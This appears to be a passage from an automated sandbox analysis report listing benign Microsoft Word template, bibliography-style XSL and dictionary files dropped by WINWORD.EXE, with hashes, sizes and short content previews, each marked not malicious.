                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):268317
                                        Entropy (8bit):5.05419861997223
                                        Encrypted:false
                                        SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                        MD5:51D32EE5BC7AB811041F799652D26E04
                                        SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                        SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                        SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):255948
                                        Entropy (8bit):5.103631650117028
                                        Encrypted:false
                                        SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                        MD5:9888A214D362470A6189DEFF775BE139
                                        SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                        SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                        SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):251032
                                        Entropy (8bit):5.102652100491927
                                        Encrypted:false
                                        SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                        MD5:F425D8C274A8571B625EE66A8CE60287
                                        SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                        SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                        SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):284415
                                        Entropy (8bit):5.00549404077789
                                        Encrypted:false
                                        SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                        MD5:33A829B4893044E1851725F4DAF20271
                                        SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                        SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                        SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):294178
                                        Entropy (8bit):4.977758311135714
                                        Encrypted:false
                                        SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                        MD5:0C9731C90DD24ED5CA6AE283741078D0
                                        SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                        SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                        SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):270198
                                        Entropy (8bit):5.073814698282113
                                        Encrypted:false
                                        SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                        MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                        SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                        SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                        SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):217137
                                        Entropy (8bit):5.068335381017074
                                        Encrypted:false
                                        SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                        MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                        SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                        SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                        SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):254875
                                        Entropy (8bit):5.003842588822783
                                        Encrypted:false
                                        SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                        MD5:377B3E355414466F3E3861BCE1844976
                                        SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                        SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                        SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):344303
                                        Entropy (8bit):5.023195898304535
                                        Encrypted:false
                                        SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                        MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                        SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                        SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                        SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):250983
                                        Entropy (8bit):5.057714239438731
                                        Encrypted:false
                                        SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                        MD5:F883B260A8D67082EA895C14BF56DD56
                                        SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                        SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                        SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):51826
                                        Entropy (8bit):5.541375256745271
                                        Encrypted:false
                                        SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                        MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                        SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                        SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                        SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                        Malicious:false
                                        Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):47296
                                        Entropy (8bit):6.42327948041841
                                        Encrypted:false
                                        SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                        MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                        SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                        SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                        SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                        Malicious:false
                                        Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):34415
                                        Entropy (8bit):7.352974342178997
                                        Encrypted:false
                                        SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                        MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                        SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                        SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                        SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                        Malicious:false
                                        Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):3465076
                                        Entropy (8bit):7.898517227646252
                                        Encrypted:false
                                        SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                        MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                        SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                        SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                        SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                        Malicious:false
                                        Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                        C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):24
                                        Entropy (8bit):2.9993896755123957
                                        Encrypted:false
                                        SSDEEP:3:QDOLRMlW8Gn:Q6VMlW8G
                                        MD5:01FBC8EAAB7AC6E4BAE9C8BFF8577681
                                        SHA1:230A2E20F1CAFBEDDE01063CBA0FB40C81D1C966
                                        SHA-256:867B47C3C977F07C1905B3FBC883983FDF02E7F389AE7FA999B3CFCA7F5A2867
                                        SHA-512:AB1021D58DB2E32AA2137E399594609C65BD08D9A25FDDCD3E7028FF8989B6F42725C07CB443645D7916B2740989A83237359C242883E1EFC6E05E3FA989CABD
                                        Malicious:false
                                        Preview:..f.r.o.n.t.d.e.s.k.....

                                        C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                        Category:dropped
                                        Size (bytes):2
                                        Entropy (8bit):1.0
                                        Encrypted:false
                                        SSDEEP:3:Qn:Qn
                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                        Malicious:false
                                        Preview:..

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1E08BMPHSAQO8BS0S0DF.temp

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
